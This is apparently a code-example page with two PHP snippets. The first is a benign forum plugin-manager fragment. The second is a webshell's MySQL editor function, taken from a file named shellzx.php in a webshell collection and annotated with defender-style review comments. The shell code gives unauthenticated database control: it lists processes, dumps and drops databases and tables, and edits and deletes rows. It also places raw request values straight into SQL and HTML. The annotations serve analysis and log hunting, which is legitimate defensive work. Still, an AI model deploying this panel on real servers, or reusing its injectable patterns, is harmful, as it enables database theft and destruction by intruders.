예제 #1
            	$navMenu->setupnav('hack_'.$key);
            }
            */
            $db_hackdb[$key] = array(stripslashes($value), $key);
        }
    }
    setConfig('db_hackdb', $db_hackdb);
    updatecache_c();
    //$navMenu->cache();
    adminmsg('operate_success');
} elseif ($action == 'delete') {
    InitGP(array('id'));
    empty($db_hackdb[$id]) && adminmsg('hackcenter_del');
    unset($db_hackdb[$id]);
    $sqlarray = file_exists(R_P . "hack/{$id}/sql.txt") ? FileArray($id) : array();
    !empty($sqlarray) && SQLDrop($sqlarray);
    setConfig('db_hackdb', $db_hackdb);
    $navMenu = L::loadClass('navmenu');
    $navMenu->settype('bbs_navinfo');
    $navMenu->del('hack_' . $id);
    $navMenu->cache();
    adminmsg('operate_success');
} elseif ($action == 'add') {
    InitGP(array('hackdir', 'hackname', 'hackopen'), 'G');
    !empty($db_hackdb[$hackdir]) && adminmsg('hackcenter_sign_exists');
    $sqlarray = file_exists(R_P . "hack/{$hackdir}/sql.txt") ? FileArray($hackdir) : array();
    !empty($sqlarray) && SQLCreate($sqlarray);
    $db_hackdb[$hackdir] = array($hackname, $hackdir, $hackopen);
    setConfig('db_hackdb', $db_hackdb);
    $navMenu = L::loadClass('navmenu');
    $navMenu->settype('bbs_navinfo');
예제 #2
파일: shellzx.php 프로젝트: Theov/webshells
/**
 * Render the MySQL browse/edit panel and run the database action selected by
 * the current request (list processes, list databases/tables, edit, delete,
 * paginate rows). Takes no parameters and returns nothing; all input comes
 * from $_SESSION, $_GET and $_POST and all output is echoed HTML.
 *
 * Review notes for defenders reading this listing:
 * - No authentication or authorisation check is visible inside this function;
 *   any gate would have to live elsewhere in the file.
 * - Uses the legacy mysql_* extension, which was removed in PHP 7.0, so the
 *   code as written only runs on PHP 5.x hosts.
 * - Request values are interpolated directly into SQL text (identifiers and
 *   values) and into HTML attributes/URLs; the only escaping in the function
 *   is htmlspecialchars() on row cells in the table listing.
 * - Destructive actions (drop database, drop table, delete row) are triggered
 *   by GET parameters alone; no anti-CSRF token is checked here.
 * - The parameter names used by the panel are useful hunting signals in web
 *   server logs and WAF rules: GET act=sqledit / act=download / act=logout,
 *   db, tbl, dropdb, droptbl, field, v, del, insert, s; POST sqlquery, sql,
 *   sql_list_proc, dbc, db_name, tblc, table_name, db_current, sqlsave.
 * - db_create(), table_create(), SQLInsert() and SQLDrop() are defined outside
 *   this block and are called without arguments, so they presumably read the
 *   request superglobals themselves; verify against the rest of the file.
 */
function SQLEditor()
{
    // Imports every session key as a local variable. $mhost, $mport, $muser,
    // $mpass and $self are not assigned anywhere in this function, so they
    // presumably come from the session; confirm where they are stored.
    extract($_SESSION);
    // '@' suppresses connection warnings; on failure $conn is falsy and the
    // function silently produces no output (there is no else branch).
    $conn = @mysql_connect($mhost . ":" . $mport, $muser, $mpass);
    if ($conn) {
        // Header plus the free-form "quick query" form. $_GET['db'] is echoed
        // into a hidden field without HTML escaping.
        echo "Logged in as {$muser}@{$mhost} <a href='{$self}?act=logout'>[Logout]</a><center>";
        echo "<form method='POST' action='{$self}?'>\n            Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>\n            <input type='hidden' name='db' value='{$_GET['db']}'>\n            <input type='submit' value='Go' name='sql'>\n            </form>";
        echo "<form action='{$self}?act=sqledit' method='post'>\n            <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>\n            </form></center></br></br>";
        // Optional server process listing; the returned fields are printed
        // without escaping.
        if (isset($_POST['sql_list_proc'])) {
            $res = mysql_list_processes();
            echo "<table style='margin: auto; text-align: center;'><tr>\n                <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>\n                </tr>";
            while ($r = mysql_fetch_assoc($res)) {
                echo "<tr><td>{$r['Id']}</td><td>{$r['Host']}</td><td>{$r['db']}</td><td>{$r['Command']}</td><td>{$r['Time']}</td></tr>";
            }
            mysql_free_result($res);
            echo "</table></br>";
        }
        // View 1: no database selected -> list every database with its table
        // count and per-database Download / Drop links.
        if (!isset($_GET['db'])) {
            if (isset($_POST['dbc'])) {
                db_create();
            }
            // Drop is reachable through a plain GET link (see the 'Drop' anchor
            // emitted below).
            if (isset($_GET['dropdb'])) {
                SQLDrop();
            }
            echo "<table style='margin: auto; text-align: center;'>\n            <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
            $all_your_base = mysql_list_dbs($conn);
            while ($your_base = mysql_fetch_assoc($all_your_base)) {
                // Database name is placed in the statement unquoted.
                $tbl = mysql_query("SHOW TABLES FROM {$your_base['Database']}");
                $tbl_count = mysql_num_rows($tbl);
                echo "<tr><td><a href='{$self}?act=sqledit&db={$your_base['Database']}'>{$your_base['Database']}</td><td>{$tbl_count}</td><td><a href='{$self}?act=download&db={$your_base['Database']}'>Download</a></td><td><a href='{$self}?act=sqledit&dropdb={$your_base['Database']}'>Drop</a></td></tr>";
            }
            echo "</table></br><center><form action='{$self}?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
        // View 2: database selected, no table -> list its tables with column
        // counts and per-table Dump / Drop links.
        } elseif (isset($_GET['db']) && !isset($_GET['tbl'])) {
            if (isset($_POST['tblc'])) {
                table_create();
            }
            if (isset($_GET['droptbl'])) {
                SQLDrop();
            }
            echo "<table style='margin: auto; text-align: center;'>\n            <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
            // $_GET['db'] goes into the SQL text and into the links below
            // verbatim.
            $tables = mysql_query("SHOW TABLES FROM {$_GET['db']}");
            while ($tblc = mysql_fetch_array($tables)) {
                $fCount = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$tblc['0']}");
                $fc = mysql_num_rows($fCount);
                echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$tblc['0']}'>{$tblc['0']}</a></td><td>{$fc}</td><td><a href='{$self}?act=download&db={$_GET['db']}&tbl={$tblc['0']}'>Dump</td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&droptbl={$tblc['0']}'>Drop</a></td></tr>";
            }
            echo "</table></br><center><form action='{$self}?act=sqledit&db={$_GET['db']}' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='{$_GET['db']}' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
        // View 3: save an edited row. The target row is selected by the
        // field/value pair taken from the query string.
        } elseif (isset($_GET['field']) && isset($_POST['sqlsave'])) {
            // The first SELECT is only used to learn the row's column names.
            $discard_values = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
            $values = mysql_fetch_assoc($discard_values);
            $keys = array_keys($values);
            $values = array();
            // Keep only POST fields whose name matches a column; values are
            // collected in POST order.
            foreach ($_POST as $k => $v) {
                if (in_array($k, $keys)) {
                    $values[] = $v;
                }
            }
            // Build "col='value', ..." pairing $keys and $values by position;
            // the posted values are embedded in the statement without escaping.
            $query = "UPDATE {$_GET['db']}.{$_GET['tbl']} SET ";
            for ($y = 0; $y < count($values); $y++) {
                if ($y == count($values) - 1) {
                    $query .= "{$keys[$y]}='{$values[$y]}' ";
                } else {
                    $query .= "{$keys[$y]}='{$values[$y]}', ";
                }
            }
            $query .= "WHERE {$_GET['field']} = '{$_GET['v']}'";
            // On failure the raw MySQL error text is printed and the script
            // stops.
            $try = mysql_query($query) or die(mysql_error());
            echo "<center>Table updated!<br>";
            echo "<a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}'>Go back</a><br><br>";
        // View 4: edit form for one row, one text input per column.
        } elseif (isset($_GET['field']) && isset($_GET['v']) && !isset($_GET['del'])) {
            echo "<center><form action='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$_GET['field']}&v={$_GET['v']}' method='post'>";
            $sql_fields = array();
            $fields = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
            while ($field = mysql_fetch_assoc($fields)) {
                $sql_fields[] = $field['Field'];
            }
            $data = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}='{$_GET['v']}'");
            $d_piece = mysql_fetch_assoc($data);
            // Stored cell values are written into value='...' attributes
            // without HTML escaping.
            for ($m = 0; $m < count($sql_fields); $m++) {
                $point = $sql_fields[$m];
                echo "{$point}: <input type='text' value='{$d_piece[$point]}' name='{$sql_fields[$m]}'></br>";
            }
            echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
        // View 5: table contents, 250 rows per page, with optional insert and
        // delete handled first.
        } elseif (isset($_GET['db']) && isset($_GET['tbl'])) {
            if (isset($_GET['insert'])) {
                SQLInsert();
            }
            if (isset($_GET['field']) && isset($_GET['v']) && isset($_GET['del'])) {
                echo "<center>";
                // Row delete driven entirely by GET parameters. Unlike the
                // SELECT/UPDATE statements above, the value is not quoted here.
                if (@mysql_query("DELETE FROM {$_GET['db']}.{$_GET['tbl']} WHERE {$_GET['field']}={$_GET['v']}")) {
                    echo "Row deleted</br>";
                } else {
                    echo "Failed to delete row</br>";
                }
                echo "</center>";
            }
            echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&insert=1'>[Insert new row]</a></center>";
            echo "<table style='margin: auto; text-align: center;'><tr>";
            // Header row: column names are collected for the loop below.
            $cols = mysql_query("SHOW COLUMNS FROM {$_GET['db']}.{$_GET['tbl']}");
            $fields = array();
            while ($col = mysql_fetch_assoc($cols)) {
                array_push($fields, $col['Field']);
                echo "<td>{$col['Field']}</td>";
            }
            echo "</tr>";
            // The offset 's' is the one request value that is validated
            // (is_numeric) before being placed in SQL.
            if (isset($_GET['s']) && is_numeric($_GET['s'])) {
                $selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT {$_GET['s']}, 250");
            } else {
                $selector = mysql_query("SELECT * FROM {$_GET['db']}.{$_GET['tbl']} LIMIT 0, 250");
            }
            while ($select = mysql_fetch_row($selector)) {
                echo "<tr>";
                // Cell contents are HTML-escaped here; this is the only
                // escaped output in the function.
                for ($i = 0; $i < count($fields); $i++) {
                    echo "<td>" . htmlspecialchars($select[$i]) . "</td>";
                }
                // Edit/Delete links identify the row by its first column's name
                // and value; the value is placed in the URL unescaped.
                echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}'>Edit</a></td><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&field={$fields['0']}&v={$select['0']}&del=true'>Delete</a></td>";
                echo "</tr>";
            }
            echo "</table>";
            echo "<table style='margin: auto;'>";
            // Pagination links step the offset by the 250-row page size; "Next"
            // is shown when the current page returned more than 249 rows.
            if (isset($_GET['s'])) {
                $prev = intval($_GET['s']) - 250;
                $next = intval($_GET['s']) + 250;
                if ($_GET['s'] > 0) {
                    echo "<tr><td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$prev}'>Previous</a></td>";
                }
                if (mysql_num_rows($selector) > 249) {
                    echo "<td><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s={$next}'>Next</a></td></tr>";
                }
            } else {
                echo "<center><a href='{$self}?act=sqledit&db={$_GET['db']}&tbl={$_GET['tbl']}&s=250'>Next</a></center>";
            }
            echo "</table>";
        } else {
            // Fallback: clear the session and redirect to the login view.
            // NOTE(review): the branches above already cover every db/tbl
            // combination, so this branch looks unreachable; confirm.
            $_SESSION = array();
            session_destroy();
            header("Location: {$self}?act=sql");
        }
    }
}